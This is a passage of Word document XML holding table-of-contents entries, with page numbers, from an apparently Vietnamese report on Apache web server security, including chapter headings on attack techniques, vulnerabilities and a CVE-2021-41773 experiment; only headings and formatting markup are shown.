              <w:instrText xml:space="preserve"> PAGEREF _Toc171085498 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2C25BE29" w14:textId="6EB3A416" w:rsidR="0039084A" w:rsidRDefault="007C0A15">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1540"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc171085499" w:history="1">
            <w:r w:rsidR="0039084A" w:rsidRPr="00B64A2B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.1.1.</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0039084A" w:rsidRPr="00B64A2B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Giới thiệu về Apache</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc171085499 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3EFD00FD" w14:textId="05C051CD" w:rsidR="0039084A" w:rsidRDefault="007C0A15">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1540"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc171085505" w:history="1">
            <w:r w:rsidR="0039084A" w:rsidRPr="00B64A2B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.1.2.</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0039084A" w:rsidRPr="00B64A2B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Cách thức hoạt động của Apache</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc171085505 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0B1BB870" w14:textId="33AEE0C7" w:rsidR="0039084A" w:rsidRDefault="007C0A15">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1540"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc171085506" w:history="1">
            <w:r w:rsidR="0039084A" w:rsidRPr="00B64A2B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cs="Times New Roman"/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.1.3.</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0039084A" w:rsidRPr="00B64A2B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cs="Times New Roman"/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>So sánh Apache với các Web Server phổ biến khác</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc171085506 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="417F61F3" w14:textId="1830FF11" w:rsidR="0039084A" w:rsidRDefault="007C0A15">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1540"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc171085507" w:history="1">
            <w:r w:rsidR="0039084A" w:rsidRPr="00B64A2B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.1.4.</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0039084A" w:rsidRPr="00B64A2B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Ưu điểm và nhược điểm của Apache</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc171085507 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4EDD8922" w14:textId="3D8C5773" w:rsidR="0039084A" w:rsidRDefault="007C0A15">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1100"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc171085508" w:history="1">
            <w:r w:rsidR="0039084A" w:rsidRPr="00B64A2B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2.</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0039084A" w:rsidRPr="00B64A2B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Bảo mật trên Apache</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc171085508 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="23E2BFBC" w14:textId="72437627" w:rsidR="0039084A" w:rsidRDefault="007C0A15">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1540"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc171085509" w:history="1">
            <w:r w:rsidR="0039084A" w:rsidRPr="00B64A2B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2.1.</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0039084A" w:rsidRPr="00B64A2B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Vấn đề bảo mật trên Apache</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc171085509 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4CE255BB" w14:textId="57C9E73E" w:rsidR="0039084A" w:rsidRDefault="007C0A15">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1540"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc171085516" w:history="1">
            <w:r w:rsidR="0039084A" w:rsidRPr="00B64A2B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2.2.</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0039084A" w:rsidRPr="00B64A2B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Một số kĩ thuật tấn công Apache phổ biến</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc171085516 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="21FFB6E2" w14:textId="0484641F" w:rsidR="0039084A" w:rsidRDefault="007C0A15">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1540"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc171085517" w:history="1">
            <w:r w:rsidR="0039084A" w:rsidRPr="00B64A2B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2.3.</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0039084A" w:rsidRPr="00B64A2B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Lỗ hổng trên Apache</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc171085517 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6A17CEAC" w14:textId="4B826850" w:rsidR="0039084A" w:rsidRDefault="007C0A15">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc171085518" w:history="1">
            <w:r w:rsidR="0039084A" w:rsidRPr="00B64A2B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>CHƯƠNG 4: THỰC NGHIỆM</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc171085518 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>22</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2E607CC5" w14:textId="76720070" w:rsidR="0039084A" w:rsidRDefault="007C0A15">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1100"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc171085520" w:history="1">
            <w:r w:rsidR="0039084A" w:rsidRPr="00B64A2B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.1.</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0039084A" w:rsidRPr="00B64A2B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Đối tượng thực nghiệm</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc171085520 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>22</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="469F54B4" w14:textId="6A1FA8C4" w:rsidR="0039084A" w:rsidRDefault="007C0A15">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1100"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc171085521" w:history="1">
            <w:r w:rsidR="0039084A" w:rsidRPr="00B64A2B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.2.</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0039084A" w:rsidRPr="00B64A2B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>CVE-2021-41773</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc171085521 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>22</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="69814DA3" w14:textId="402300EE" w:rsidR="0039084A" w:rsidRDefault="007C0A15">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1540"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc171085522" w:history="1">
            <w:r w:rsidR="0039084A" w:rsidRPr="00B64A2B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.2.1.</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0039084A" w:rsidRPr="00B64A2B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Thông tin cơ bản</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
